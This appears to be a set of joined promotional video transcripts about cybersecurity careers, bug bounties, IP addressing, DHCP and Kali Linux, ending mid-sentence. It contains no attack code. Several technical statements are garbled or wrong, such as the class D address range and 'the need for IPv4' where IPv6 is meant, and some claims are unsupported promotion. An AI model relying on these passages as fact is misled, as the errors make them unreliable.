Have you ever wondered what could happen if cyber criminals gained control of the AI systems driving our cars, managing our power grids, or even making critical decisions? With AI changing the world and automating the many tech jobs, cybersecurity is becoming one of the most promising career choices. As machines getting smarter, doing everything from writing code to designing cars, the risk of cyber attacks are growing just as fast. Hackers are using advanced tools, making companies more vulnerable than ever. This has created a huge demand for the cybersecurity experts to protect data, stop ransomware, and secure systems. Companies like Google, Microsoft, IBM, and the consulting firms such as the Deloitte and Accenture, along with the specialized firms like the Palo Alto Networks, are actively hiring cybersecurity professionals. In India, cybersecurity salaries range from 4 to 6 LPA for the entry-level roles to 25 to 50 plus LPA for the senior positions. While in US, they range from $70,000 to $90,000 per year for beginners to $200,000 for senior roles like CISO. Quite impressive, right? So in this video, we will learn step by step how you can land your very first cybersecurity job, from starting with zero knowledge to mastering the skills needed to get hired. I have broken down the entire roadmap into easy to follow weekly milestones. So stay tuned as we cover everything you need to know in one powerful video. Your future in cybersecurity starts here. So let's move on. Now let's start with who is a cybersecurity engineer. A cybersecurity engineer is a tech professional responsible for designing, implementing, and maintaining secure systems to protect an organization's data and infrastructure from the cyber threats. They act as the first line of defense against hackers like malware and data breaches, ensuring that the sensitive information stays safe. Now, let's understand their roles and responsibilities. The roles and responsibilities of a cybersecurity engineer are as follows. Number 1 is design secure systems. Building security architectures and implement firewalls and encryption is their first and foremost roles and responsibilities. Coming to the second one is to monitor threats, detect and respond to suspicious activities and breaches. Now moving on to the third, that is access vulnerabilities, conduct checks to identify and fix system weaknesses. Now moving on to the fourth, we have develop policies, create security guidelines, and train employees. Now, moving on to the fifth, we have maintaining tools, manage antivirus software, firewalls, and security systems. Cybersecurity engineers play a vital role in safeguarding the digital assets and maintaining trust in a connected world. Now, moving on to the skills required to become a cybersecurity engineer. If you are aiming to become a cybersecurity engineer, there's a mix of technical and soft skills you will need to master. So, let's break it down into bite-sized, relatable pieces. First, we have some technical skills to become a cybersecurity engineer. The first one is networking. You need to have a strong grip on how the internet and the network function works. Think TCP IP, DNS, VPNs, and firewalls. These are the building blocks of security. If you don't know this, it's likely trying to guard a house without knowing where the doors are. Now, moving on to the second, we have operating systems. Be a pro at securing Windows, Linux, and Mac. Each OS has its quirks, and understanding their security setups is key to defending against the attack. Now, moving on to the third, we have programming. You don't need to be a coding wizard, but familiarity with Python, Java, or C++ will give you an edge. Even scripting with Bash or PowerShell can help automate the security task. Now, fourth, we have cloud security. Companies are in the cloud, so you need to know how to secure platforms like AWS, Azure, or Google Cloud. The future of data is here and it needs protection. Now, moving on to the cybersecurity tools under the skills required to become a cybersecurity engineer. You will spend a lot of time with the tools like Is Iam, for example, the Splunk and the QRadar, IDS and IPS antivirus software, and endpoint protection systems. These are your shields and swords in the fight against the cyber threats. Now we have risk management. Every system has weak spots. Your job is to find them. Learn to conduct vulnerability assessments and penetration tests, and then fix those issues before hackers can exploit them. Now, you should have a knowledge of security standards. Understand the compliance frameworks like ISO 27001, GDPR, HIPAA, and NIST. Think of this as the rule book that keeps companies' security practices in check. Now, moving on to the soft skills section. In the soft skills section, we have analytical thinking. Cyber threats are like puzzles. Your job is to solve them. Quick thinking and problem solving are your superpowers. Now, moving on to the second one is communication. You will often need to explain the complex tech issues to the people who don't speak tech. Simplify, clarify, and get them on board. Now, third, we have attention to detail. Spotting the tiniest vulnerability can save a company from massive losses. Your eagle eyes will make all the difference. Now, continuous learning. Cyber threats evolve every day, and so should you. Stay ahead by keeping up with the latest trends, tools, and attack methods. In cybersecurity, learning never stops. It's what keeps the job exciting. Master these skills and you will not only be ready for a cybersecurity role, but also thrive in a fast-paced, ever-changing field. Ready to take on the challenge? Now, let's see how to become a cybersecurity engineer in 2025. So, are you starting from the scratch but want to become a cybersecurity engineer in 2025? No problem. Here's a step-by-step, week-by-week roadmap to take you from zero to cybersecurity ready in just 6 weeks. So, let's move on. For week 1, we have master the basics. Now, mastering the basics involves network fundamentals, that is, learning about IP addresses, TCP IP, DNS, and how networks function. Tools like Cisco Packet Tracer or YouTube tutorials are a great starting point. Secondly, we have operating system. Understand Windows and Linux basics. Install a Linux distro, for example, the Ubuntu, and explore terminal commands. Thirdly, we have Cybersecurity 101. Watch the beginner-friendly videos to grasp concepts like firewalls, encryption, and access controls. Now, our daily goal is to dedicate 1 to 2 hours to learning and experimenting with tools like Wireshark for network analysis. Now, moving on to the second week, we have building foundational skills. So, here we begin with scripting and automation. Start learning Python as it is beginner friendly and widely used in cybersecurity. practice writing basic concepts to automate tasks. Secondly, we have basic security practices. Understand how antivirus software, VPNs, and firewalls work. Practice configuring a firewall on your system. Hands-on practice. Build your first simple security project like scanning for the open ports using Python. Then, our daily goal is to work on one practical exercise daily, such as creating a simple script or configuring a security setting. Now, moving on to the third week, we have exploring tools and techniques. Firstly, we will start with cybersecurity tools. Get familiarized with essential tools like Is Iam, Splunk, QRadar, and endpoint protection software. Then we have vulnerability assessment. Learn about the penetration testing and practice with the free tools like Kali Linux and Metasploit. Now, moving on, we have cloud security basics. Explore the cloud platforms like AWS, Azure, or Google Cloud and their security features. Start with the free tier accounts. Now, our daily goal is to set up and test at least one cybersecurity tool each day. For example, run a vulnerability scan. Now, moving on, we have the fourth week as earn your first certification. So, we will begin with the certification preparation. Begin preparing for the beginner-friendly certifications like TIA Security Plus or Certified Ethical Hacker SEH. Use free resources or enroll in a boot camp if needed. Then we have practice exams. Take mock tests to familiarize yourself with the certification format. Hands-on labs. Use platforms like TryHackMe or Hack the Box for real-world practice. Now, our daily goal is to study for 1 to 2 chapters of the certification syllabus and practice related skills. Now, moving on, we have the fifth week as work on projects for your portfolio. Now, creating a portfolio like a penetration testing report for your home lab, a Python script that automates the basic security tasks like the password strengthen checker, a case study on a famous cybersecurity breach and how it was resolved. Now, you must be thinking why it is so important. Like why the projects are so important. Projects demonstrate your practical skills to potential employers, and that's why it is so important. Now moving on to the sixth week, we have the job ready preparation, our ultimate goal in 2025. So start with creating your portfolio. Showcase your certifications of Simplilearn, projects made in this live class and achievements, include details about your hands-on experience. Then comes resume and LinkedIn, like the projects, building a professional resume tailored for cybersecurity roles. Optimize your LinkedIn and highlight your skills. Now, apply for jobs. Target the entry-level roles like the SOC analyst, security analyst, or IT support with a focus on security. Now, getting interview preparation, like practice the common cybersecurity interview questions and perform the mock interviews. Our daily goal will be to apply at least 5 jobs daily and connect with the industry professionals for guidance. Now, by following the structured 6-week plan, you will gain the foundational skills, hands-on experience, and confidence needed to step into the world of cybersecurity. Stay consistent, keep learning, and remember, every expert was once a beginner. Your cybersecurity journey starts now. All the best.
First, let me introduce you to someone, Jack, who was once a notorious figure in the world of hacking. Back in early 2000, he was involved in several illegal activities and got caught up with the law. But fast forward to today, Jack is making $2 million a year from ethical hacking, all legally. So how did someone like Jack go from breaking the law to being one of the most respected ethical hackers? He discovered bug bounty hunting, a powerful field within the world of cybersecurity. Now, imagine you're living in a small town with no fancy degrees or tech background, but you've got the skills and determination to find bugs. Big companies are offering thousands, even millions of dollars to those who can uncover vulnerabilities in their system. And the best part is, you don't need a fancy office or a degree in cybersecurity. All you need is the right roadmap, and that's exactly what I'm going to give you today. So in this video, we will cover what bug bounty programs are there and how they work, building the foundational skills you need, how to practice and get better, how much money can you really make, the top platforms like HackerOne and Bugcrowd, and common mistakes beginners make and how to avoid them, the best tools and resources to get started, where to apply and what companies are hiring, the eligibility criteria, and finally, how to keep growing your skills. So let's get started. So first things first, what exactly is a bug bounty program and how do they actually work? Well, a bug bounty program are pretty straightforward. Companies big and small pay ethical hackers, that is the bug bounty hunters, to find vulnerabilities in their system. These bugs could be anything from a small issue in the code to a major security flaw that could affect thousands of users. Now let's talk about how does it actually work. Well, a company defines the scope and the rule of its program. This means what system, apps or websites you are allowed to test. So once you find a vulnerability, you report it via their platform. If your find is valid, the company verifies it and rewards you, often with money, but also sometimes with a swag or even job opportunities. The reward you get depends on severity of the bug. For example, finding a critical security flaw in a system might earn you thousands of dollars, while a minor bug could get you a couple of hundred. Now let's talk about building the foundational skills which you need. To start with big bounty hunting, you need to build a solid foundation. Don't worry, you don't need a degree in cybersecurity, of course, but here's what you'll need to get started. First, you need to know about the networking basics. You need to understand how networks work, what LAN and WAN are, and how data flows across the internet. Now, this helps you understand vulnerabilities that can exist within those networks. The second foundational skill is the web technologies. You should learn about HTML, CSS, JavaScript, and HTTP, HTTPS. You'll also need to understand DNS and how web applications function. Now, if you are a beginner, think of it like learning how to make a website before you can break into one. The third skill is security tools. Familiarize yourself with essential security tools, Burp Suite, NMAP, and OWASP, ZAP, which are all the important tools to have in your toolkit when you begin testing web applications for vulnerabilities. The fourth skill is learning a programming language. Languages like Python, PHP, Java, Ruby are often used in web development and can help you understand how vulnerabilities are coded into a system. A little knowledge of these languages goes a long way. Now let's see how you can practice and get better. So once you have all the basics down, it's time to practice. So first you can start by joining bug bounty platforms like HackerOne, Bugcrowd, Integrity. So these platforms will allow you to test your skills and practice finding bugs in live environments. But that's not all. You can also join the CTF, which is Capture the Flag, challenges on platforms like Hack the Box and Try Hack Me. Now, these are safe, fun environments where you can learn real-world penetration testing techniques while solving hacking challenges. And remember, focus on one bug at one time. Trying to learn everything at once can be obviously overwhelming. So start with one vulnerability like suppose XSS or SQL Injection, and then master it before moving on to others. Now let's talk about how much money can you actually make. You might be wondering how much money can you make in a bug bounty hunting, right? Let's get into it. Well, in the US, now entry-level bug bounty hunters can expect to make around $50,000 to $80,000 per year, and with experience that can rise up to $100,000 to $200,000 or even more depending on how skilled you are. In India, a fresher can start with around 5 to 10 lakh per year, and as you gain experience, you could earn even 15 lakhs or more, with top hunters making significantly higher. Now in 2022, Facebook paid $2 million and Google paid $12 million in bug bounties, which is pretty impressive, right? Realistically, you can even start earning between $200 to $2,000 per bug, depending on the severity. But top bounty hunters can make upwards to $200,000 a year or even more. Now, the best part is bug bounty hunting is remote. You can work from anywhere in the world. As long as you're consistent and skilled, the money will follow. Let's talk about the top bug bounty platforms. So there are majorly two major platforms if you want to focus on. The first is the HackerOne, which is known for big companies like Uber, Twitter, and GitHub. This platform allows you to build your reputation, and once you have a solid track record, you can get invites to private program. Bug Crowd, which is similar to HackerOne, lets you apply to join private programs. It's a bit more structured in that sense, but it's just as lucrative as you are consistent with your submissions. Now let's talk about some common mistakes and how to avoid them. First is trying to do much at once. Now it's tempting, of course, to learn everything at once, but picking one bug type like XSSS and master it before moving on to others. The second one is getting too caught up in automation. Now tools like Burpsuit and NMAP are great, of course, but automation is meant to complement your work, not replace it. Understand how to hack manually before using automation. The third one is not reading write-ups. Successful hackers often learn from others. Read write-ups from other bug bounty hunters to understand different approaches to vulnerabilities. Now let's talk about the best tools and the resources that you can get started with. To get started, you need few tools and resources. So first we've got Burpsuit, a must-have for web app testing. You'll use this to manipulate and test web requests. Then we have got NMAP. You can use this tool for network scanning and identifying open ports. Then we have Hack the Box, which is a great platform for practicing penetration testing in a virtual environment. We also have Web Application Hackers Handbook. Now, this book is a must read to understand how web applications are tested for vulnerabilities. And remember, you don't need to spend a ton of money to get started. There are free resources everywhere. YouTube channel, forums, blogs are loaded with information that you can learn from. Also, just a quick information, guys, if you're interested in stepping into one of the most in-demand fields of 2025, then the Advanced Executive Program in Cybersecurity by Simplilearn is your perfect opportunity for you. Now, in just 6 months, you will gain expertise in ethical hacking, penetration testing, ransomware analysis, and advanced defense strategies through a hands-on industry-relevant approach. Now, this program, offered in collaboration with the IIIT Bangalore and IBM, features live interactive classes, real-world projects, and industry-recognized certifications. You'll also benefit from the master classes by the IIT Bangalore faculty and ex-NPCR expert diving into cutting-edge topics like GenAI with cybersecurity. So hurry up and enroll now and find the course link in the description box below and in the pinned comments. Now let's talk about getting a job in bug bounty, where to apply and what companies are hiring. So now you've built your skill, completed some challenges, and maybe even made a few bug bounty submissions. Now you're probably wondering, how do I turn this into a full-time career and land a cybersecurity job? So let's talk about a lot of companies which are investing heavily on bug bounty programs. So they need experienced security professionals to know how to haunt their vulnerabilities. So at first we've got Meta, Facebook, then we have Google, we have Apple, Uber, Airbnb, Microsoft, GitHub, Twitter, Shopify. Now, these companies often have dedicated security teams that rely on ethical hackers to find vulnerabilities. So while bug bounty hunting is one way to make money, many hunters transition into full-time security roles once they have proven their skills. Talking about where to apply, so once you have built your skills to platforms like HackerOne, Bugcrowd, and Integrity, you can apply directly to the security team at many tech companies. Now here's how. At the first position you can apply is the security analyst and the engineer roles. So after gaining experience in bug bounty hunting, you can apply for jobs as a security engineer or security analyst. Now these positions often requires knowledge in penetration testing, vulnerability assessment, and incident response. Now if you want a full course on all these topics discussed, you can just head over to Simplilearn's YouTube channel. There we have penetration testing full course, which is free of cost, and you can learn all the latest technologies. And if you want to get a job in this bug bounty program, I have attached a link in the description box, so you can check it from there. Then we also have a red team and blue team. So many security teams have obviously red teams, which is called the offensive security, and the blue team, which is called the defensive security. Now, bug bounty hunters often transition into red team roles, where they actively test and break into systems to find vulnerabilities. Bug bounty hunters who specialize in web application vulnerabilities often make excellent penetration testers. So obviously this bug bounty hunting is open to everyone. Now if you're aiming for a full-time job in cybersecurity, here's what you should consider. The first is experience. So while you don't need a formal degree, as I told you before, companies typically look for candidates with at least 2 to 3 years of experience in cybersecurity. You can get this experience by starting with bug bounty platforms, capture the flag challenges, and personal projects. The next is certifications. Although not mandatory, certifications like Certified Ethical, CEH, OSCP, which is Offensive Security Certified Professional, and CISSP, which is Certified Information System Security Professional, can help you boost your credibility and increase your chances of getting hired. Then you can also build a strong portfolio. Companies love to see actual findings and valid reports that demonstrate your skills. You also need to have good problem solving skills. You need to be persistent and have strong problem solving skills, as bug bounty hunting requires a lot of trial and error. Now let's talk about your path to a full-time career. So of course, bug bounty hunting can serve as a springboard to a full-time career in cybersecurity. The skills you learn are transferable to many roles such as security analyst, penetration tester, or cybersecurity consulting firms. So the first thing is you need to focus on learning continuously. You need to build a reputation by submitting well-documented reports and engaging in the community. This is very crucial. You should also apply to tech companies once you have gained experience on platforms like HackerOne and Bug. The next is you need to keep your options open. Bug bounty hunting can evolve into freelance and remote work opportunities. So whether you're looking for a side hustle or a full-time job, or you just want to level up your cybersecurity skills, bug bounty hunting has incredible potential to reward financially and professionally. Remember guys, this is a journey where you'll need patience, consistent practice, and desire to learn. But once you master all the basics, it is set for you to set up a successful career that's both financially rewarding and intellectually satisfying.
So now let's get started with who is a cybersecurity engineer. So cybersecurity engineer is a professional who specializes in protecting computer and network systems from digital attacks. So these attacks can include hacking, breaches, viruses, and various forms of cyber threats. So now we'll see the roles and responsibilities of a cybersecurity engineer. So first role and responsibility for a cybersecurity engineer is system protection. That is implementing and managing security solutions to protected systems, networks, and data. This includes firewalls, antivirus software, and intrusion detection systems. And then comes threat assessment. So continuously monitoring and assessing the cybersecurity or the security of computer system and networks, identifying potential vulnerabilities that could be exploited by hackers. And then comes the incident response. So responding to and investigating cybersecurity breaches or any type of cybersecurity incident. This involves not only addressing the immediate threat but also conducting post-event analysis to prevent future incidents. And then comes security planning. So developing and implementing security policies and protocols. They ensure that an organization's data and infrastructure are protected against potential attacks. And then comes regular update and maintenance. So keeping systems updated and patched against known vulnerabilities, which is crucial in defending against rapidly evolving cyber threats. And then comes collaboration. So working with other IT professionals such as network administrators and software developers to ensure that security considerations are integrated into all facets of technology operations. And then comes education and training. So educating staff and users about good security practices like identifying phishing attempts and securing personal data. So these are the roles and responsibilities of a cybersecurity engineer. Now we'll see the essential skills needed to become a cybersecurity engineer. So certainly here's a list of essential skills, and we'll start with the one that is strong understanding of networking. So cybersecurity engineers need to have a deep understanding of networking protocols, how data travels across networks, and the vulnerabilities associated with different network configurations. And then comes programming and scripting. That is, proficiency in programming languages like Python, C, C++, and scripting languages is crucial for writing custom exploits and tools. And then comes cybersecurity fundamentals. So a solid grasp of basic cybersecurity concepts, including threats, vulnerabilities, risk assessment, management, and security principles is fundamental. And then comes operating systems. So familiarity with various operating systems including Windows, Linux and Unix is essential for understanding their vulnerabilities and security configurations. And then comes web application and security. Knowledge of web technologies, web application vulnerabilities such as SQL injection, cross-site scripting and security best practices for web development. And then comes the penetration testing tools. So proficiency in tools like Metasploit, NMAP, Wireshark, Burpsuit and other penetration testing tools used to assess system vulnerabilities. And then comes cryptography, that is understanding of encryption, decryption, cryptographic algorithms and their role in securing data. And then comes wireless security. So expertise in wireless network security including Wi-Fi encryption protocols and vulnerabilities. And then comes security compliance and standards. So knowledge of security standards and compliance regulations such as PCI, DSS, HIPAA and GDPR. And then comes incident response. So being prepared to handle security incidents and breaches effectively, including forensics and analysis. And then comes social engineering awareness. So understanding of social engineering tactics used by attackers to manipulate individuals into revealing confidential information. And then comes the ethical mindset. So a cybersecurity engineer must adhere to a strong code of ethics and prioritize responsible disclosure when vulnerabilities are found. So these are the essential skills to become a cybersecurity engineer. Now we'll see how to become a cybersecurity engineer. So the first step is build a strong foundation, or you could have a bachelor's degree in cybersecurity. So building a strong foundation is crucial in the journey to become a cybersecurity engineer. So start with a deep understanding of computer science, mastering the basics of hardware, software and networks. Familiarize yourself with operating systems and their functionalities. Entry-level certifications like CompTIA Plus and Network Plus are your stepping stones, ensuring you grasp the core concepts of IT. A strong foundation forms the bedrock upon which you will build your ethical hacking skills and knowledge. And then comes the next, that is learn programming. So learning programming is a gateway to unlocking endless possibilities in the digital world. Start by understanding the basics of coding logic and syntax. Explore languages like Python, known for its simplicity, or JavaScript for web development. Practice regularly, work on real projects, and seek online tutorials and courses. Embrace problem solving and debugging, and gradually you will master the art of programming. That will open the doors to a world of software development and cybersecurity innovation. And then comes understand cybersecurity basics. So understanding cybersecurity basics is crucial for any aspiring cybersecurity engineer. It involves comprehending the core principles of protecting digital systems and data. Key concepts include identifying threats, vulnerabilities, and the importance of risk management. Certification programs like CompTIA Security Plus can provide an entry point into this realm. These basics form the foundation for ethical hacking, enabling individuals to recognize and combat security weaknesses, making the digital world safer. And then comes the fourth step, that is dive into ethical hacking. So dive into ethical hacking is a critical step on the journey to becoming a skilled cybersecurity engineer. So during this phase, you will focus on honing your penetration testing skills and mastering the art of ethical hacking. The Certified Ethical Hacker certification will be your companion, providing you with the knowledge and tools to identify vulnerabilities and secure systems. You will explore real-world scenarios, test networks, and learn to think like a hacker while maintaining ethical standards. This stage prepares you to safeguard digital landscapes effectively. And then comes continue learning. So continuing learning in ethical hacking is essential. The cybersecurity landscape evolves rapidly, so staying up to date is a must. Explore advanced certifications like CISSP and Certified Ethical Hacker to deepen your knowledge. Follow industry news, blogs, and research to remain informed about emerging threats. Join ethical hacking communities, attend conferences, and engage in ongoing practice to hone your skills. Remember, continuous learning keeps you at the forefront of cybersecurity and ensures you are well prepared to protect digital assets. And then there's the step 6, that is gain practical experience. So gaining practical experience in ethical hacking is crucial for honing your skills. Participate in capture the flag competitions, where you can solve real-world challenges and learn to think like a hacker. Explore hands-on labs and exercises that allow you to practice various hacking techniques in a controlled environment. Engage with ethical hacking communities, share knowledge, and collaborate on projects to build a strong practical foundation in cybersecurity. And then comes the step 7, that is seek employment. So to seek employment as a cybersecurity engineer, craft a resume highlighting your skills, certification, and experience. Look for opportunities in industries such as finance, healthcare, and tech companies where cybersecurity is paramount. Network with professionals in the field, explore job boards, and leverage online platforms. Cybersecurity engineers are in high demand, so be proactive in your job search and showcase your commitment to safeguarding digital assets. And then comes keep evolving. So the world of cybersecurity is constantly changing. To stay at the forefront, always be curious, embrace new technologies, and adapt to emerging threats. Regularly update your skills, earn advanced certifications, and network with fellow hackers. Remember, the cybersecurity landscape evolves, and so should you. Stay ethical, committed, and dedicated to safeguarding the digital realm. And then comes the job roles and average salary. So the first job role is cybersecurity engineer. So the cybersecurity engineer in US earns as much as $156,000 per annum. And then comes in India that he earns around 8 lakhs per annum. And then the next job role is incident responder. So the incident responder earns around $105,000 per annum in US and 7 lakhs per annum in India. And then comes the cybersecurity analyst. So he earns around $150,000 per annum in US, and in India he earns around 11 lakhs per annum. And then comes penetration tester. So penetration tester earns as much as $145,000 in US and 13 lakhs per annum in India. And then comes the cybersecurity consultant. So the cybersecurity consultant earns around $120,000 per annum in US and 10 lakhs per annum in India. Now we'll see the companies hiring cybersecurity engineers. So the first is Amazon, Accenture, Google, Apple, and Intel. So these are the topmost companies, and there are way more companies that are hiring for the cybersecurity engineer roles.
With the increase in the network-related transactions, it is important to confirm that the service is received by the host that requested it, and not some other system. And the network system that governs such protocols and set transaction rules is known as an IP address. Hi guys, and welcome to yet another interesting video by Simplilearn. But before we begin, if you love watching tech videos, subscribe to our channel and hit the bell icon to never miss an update from us. To understand the topic much better, let's take a reference. Assuming that a person had to send a letter to a relative's house, but he wasn't sure which house though. So, how can this problem exactly be solved? Well, this problem can be solved if we take a look at the house number mentioned on the mail. Let's take a look at the house number mentioned on the mail. On the mail, it seems like the house number is 2. That means the mail would go to house number 2. Similarly, we also have an identification method on the internet that is known as IP address, which is used to identify different mails and the owner of that email address. Let's now take a look at the agenda for today's video. Firstly, we'll know what is an IP address. Then we'll see what functions does IP address have. Moving on with knowing different versions of IP addresses, and lastly different types of IP address. Firstly, we'll understand what exactly is an IP address. An IP address or Internet Protocol address, for an example, is a unique numerical identifier assigned to every network device when it connects to the Internet. This address is assigned by the Internet Service Provider, which acts as a way for the system to access the Internet applications and a unique identity for the device. Moving forward, we'll understand what exactly are IP functions. To begin with, IP functions can be divided into two types. For the first function we have, the Internet Service Provider assigns an IP address to the network device. The first function of the address is to provide an identity to the host on the Internet, whereas the second identity is used as a location address for the host on the Internet. Let's now take a look at different versions of IP address. IP addresses can be divided into two types, where the first type is known as IPv4 address, whereas the other address is known as IPv6. Let's take a look at both of them in detail. For first one, we have IPv4 address. This is the original version of an IP address developed on 32-bit binary format, which contains 2 to the power 32 address. The address range from 0 to 255 in terms of zeros and ones, with 4 octets, each of them separated by a period. The network device uses binary format, whereas the numerical format is used for the host reference. The first part denotes the network part in an IP address, and the second part is for the host part. Now let's move on to the IPv6 address type. With the rise in technology, the IPv4 could not complete the requirements. So the need for IPv4 arose based on 128-bit address size, which is sufficient for a long time, which is approximately 320 undecillion. This type of IPv6 address is designed for 4 hexadecimal digits and 8 sets, with each block containing 16 bits separated by a colon. Now let's take a look at the IP classes. IP classes are designed for the purpose of easy assignment of addresses to the network. Divided on the basis of class size, we have 5 classes depending upon the requirement of the network. Class A were designed to accommodate networks with a large number of network hosts, where the first bit in the octet is always 0, with the large number ranging from 0 to 127. Then we have Class B. Class B fulfill the requirements for medium-sized network hosts, where the first 2 bits for the network ID is 1 and 0, with a range from 128 to 191. Then we have Class C, which can fulfill the requirement for small-sized network hosts, where the first 3 bits for network ID is 1, 1 and 0, ranging from 192 to 223. From this, we get that class A, B and C are used for assigning addresses to the host network. And then we have class D, which is used for multicasting, which means it is used to send a signal from one host to multiple hosts, like used in video streaming, where the first 4 bits for network ID is 1, 1, 1 and 0, with a range from 124 to 239. And lastly, we have Class E. Network ID for this range is reserved for research purpose and not assigned to any network, with a range from 240 to 255. Let's see different types of IP addresses. On the basis of accessibility, we have private IP addresses and public IP addresses. For private IP addresses, the devices are assigned addresses in a network and each system is provided with a unique IP address, which they can communicate through within the same network and cannot access public network. And they do provide much more security in regards to the public IP addresses. Let's take a look at the public IP address now. For public IP addresses, ISP or Internet Service Provider assigns it to the router, which allows the user to access the internet, and also different network application can be accessed, with security less in comparison to private IP addresses. Let's now see the other 2 types of IP addresses, which are static and dynamic IP addresses. Static IP addresses is assigned manually and is constant to the system, whereas dynamic IP address is assigned by the internet service provider. For static IP addresses, the importance is much more, whereas the address is used for business and is not beneficial to have different IP each time. In case of dynamic IP address, the assigned IP for network devices do not need dedicated IP. Due to being constant in nature, static IP address is preferred to be assigned as official address for a business. Whereas in case of dynamic IP address, due to assigning different each time when it connects to the internet, address provides much better security and often prevents hacking. Now, if we want to take a look at the IP address for a system which is publicly available, we can do by the following steps. Access your internet browser and type IP address. And over here, we can take a look at the public IP address for the system. And if we want to take a look at the system IP address which is dedicated to the device, you can do the following steps. Access command prompt and write the command ipconfig, and you can take a look at the system IP address. Internet connection is the most basic configuration setting needed for a device to access the web or different activities. But how exactly do we connect our system to the internet? This is done by accessing the DHCP network protocol. Hi guys, and welcome to yet another interesting video by Simplilearn. But before we begin, if you love watching tech videos, subscribe to our channel and hit the bell icon never to miss an update from us. Let's take a look at today's agenda. Firstly, we'll understand what exactly the DHCP protocol is. Then the allocation methods in DHCP protocol. Next, we will understand some helpful DHCP settings. And lastly, stepwise we'll understand the operation model for DHCP. Let's understand the DHCP protocol. The Dynamic Host Protocol or DHCP is a protocol that is designed to assign the IP address to a device for it to access the internet. This network model is based on the client-server architecture and removes the process of manually assigning an IP address to the system. Now let's take a look at the allocation methods for the DHCP protocol. The allocation method of DHCP is divided into two types. The first type is the manual allocation, which, as the name suggests, is the assigning of IP address to the system manually by the user. The second method is dynamic allocation, which uses a client-server architecture to assign an IP address to the system. Now let's see some points regarding the allocation method. The first type is the manual allocation. As mentioned, in this allocation type, the user manually assigns the IP address to the system for accessing the internet and can be observed in this instance. This is done by accessing the network configuration setting of the device and also requires other related configurations such as subnet mask, preferred DNS server, and default gateway. Let's now take a look at the dynamic allocation. In this allocation method, the client device receives all the relevant network configurations from the DHCP server, and the system gets configured to access the internet. The provided IP address is given for a certain period, which is also termed as the lease. Now that we somewhat understand what exactly the dynamic allocation in DHCP server is, let's take a look at a small example. Open the Start menu and type command prompt. When the windows open up, type ipconfig/all command. As we see, by this command we can take a look at the network settings for our system. Over here we can see the DHCP is enabled. That means the configuration that has been used on the system refers to the DHCP server. And on the bottom side we can take a look at the different network settings that are given along with the IP address by the DHCP server. That is subnet mask, default gateway, and the DNS server. Now let's continue with the video. Now let's take a look at some of the notable DHCP settings. The first one is known as scope. As the name suggests, a scope refers to a range of addresses that are available to a DHCP server for allocation of the client device. Next we have is lease. This setting of the DHCP server is designed to prevent the hoarding of IP addresses by a single device. This is done by assigning an expiration date to the leased IP address so that the DHCP server has some minimum addresses left for the client device. And lastly, we have address reservation. In this DHCP setting, the client device requests the server to assign the same IP address to the device each time the address allocation takes place. This is done by identifying the MAC address of the client device. Now let's take a look at the operation model for DHCP protocol. The DHCP operations are performed under User Datagram Protocol, in short UDP, which is applied on two ports under UDP, which are ports 67 and 68. The first phase is where the client broadcasts a DHCP server message over the network to connect with the DHCP server. This message basically means that it wants to connect to the internet through the DHCP server. The second phase is when the DHCP server receives the DHCP message. According to the message, the DHCP server reserves an IP address for the client and network configuration information, including subnet mask, default gateway, and preferred DNS server. In the third phase, the client responds to the DHCP server's offer through a DHCP request message, requesting the offered IP address and relevant network configuration for the system. Then in the last phase, the server acknowledges the request broadcast from the client and sends the DHCP packet to the DHCP client, which is comprised of network configuration for the client device.
With cybercrime getting more and more complex by the day, corporations are in the need of trained personnel in the field of cybersecurity. Ethical hacking and penetration testing had always been necessary for organizations and the general public to protect the system against malicious attackers. However, with the exponential growth in cyber attacks, the necessity of being trained in ethical hacking is at an all-time high. Many such professionals tend to use Linux distributions for their penetration testing activities. There are specific operating systems which are catered to ethical hackers. These operating systems come pre-installed with the necessary tools and scripts required for ethical hacking. Probably the most famous operating system in this bracket is Kali Linux. For today's video, we will learn about this distribution made by and for hackers. We take you through the intricacies of its hardware and software specifications. Let's take a look at the agenda for today. We start by learning about Kali Linux and a basic explanation of its purpose. We take a look at the history of Kali Linux from the story of its origin to its current day exploits. Next, we learn a few distinct features of Kali Linux that make it an attractive choice for penetration testers worldwide. Moving on, we take a look at the multiple ways we can install Kali Linux to start our journey in the world of penetration testing. In the next few sections, we compare it to an industry rival operating system by the name of Parrot Security Operating System. We take a look at the OS on a grassroots level. Next, we learn about the standout features of Kali Linux and Parrot Security with their unique offerings. We make a direct comparison between Kali and Parrot Security OS as far as their hardware specifications and all-around usability is concerned. We make a conclusion as to which operating system caters to which category of user. In the next topic, we take a detailed look at how we can install Kali Linux on a Windows 10 system using the VMware virtualization software. Moving on, we go through some of the reasons why people should choose Kali Linux as their primary operating system when it comes to ethical hacking and penetration testing. In the next section, we cover the 5 different phases of penetration testing, where each stage is a crucial segment in the entire cycle of our ethical hacking campaign. We also take a look at the most popular tools installed in Kali Linux that are used regularly by ethical hackers as a part of their professional work. Coming to a few live demonstrations, we start by learning some Linux terminal basic commands, set up proxy chains to maintain our privacy on the internet, run a few NMAP scans to find information about our victims, use Wireshark to detect insecure browser traffic traveling through HTTP web pages, learn about Metasploit and its components, and finally use Metasploit to hack into a Windows 10 machine and grant ourselves root access or the admin access, which basically gives us the key to the entire machine. It's no secret that the majority of our internet usage is at the risk of being hacked, be it via unsafe messaging applications or misconfigured operating systems. To counteract this void of digital security, penetration testing has become the norm when it comes to vulnerability assessment. Kali Linux is an operating system that has become a well-known weapon in this fight against hackers. A Linux distribution that is made specifically for penetration testers, Kali Linux has layers of features that we will be covering in today's lesson. Let's take a look at the topics to be covered in this video. We start by learning about Kali Linux and a basic explanation of its purpose. We take a look at the history of Kali Linux from the story of its origin to its current day exploits. Next, we learn a few distinct features of Kali that make it an attractive choice for penetration testers worldwide. Finally, we take a look at the multiple ways we can install Kali Linux to start our journey in the world of penetration testing. Let's start by learning about Kali Linux in general. Kali Linux, which is formerly known as Backtrack Linux, is an open source Linux distribution aimed at advanced penetration testing and security auditing. It contains several hundred tools that are targeted towards various information security tasks such as penetration testing, security research, computer forensics, and reverse engineering. Kali Linux is a multiple platform solution, accessible and freely available to information security professionals and hobbyists. Among all the Linux distributions, Kali Linux takes its roots from the Debian operating system. Debian has been a highly dependable and stable distribution for many years, providing a similarly strong foundation to the Kali desktop. While the operating system is capable of practically modifying every single part of our installation, the networking components of Kali become disabled by default. This is done to prevent any external factors from affecting the installation procedure, which may pose a risk in critical environments. Apart from boosting security, it allows a deeper element of control to the most enthusiastic of users. We did not get Kali Linux since the first day. How did it come into existence? Let's take a look at some of its history. Kali Linux is based on years of knowledge and experience in building penetration 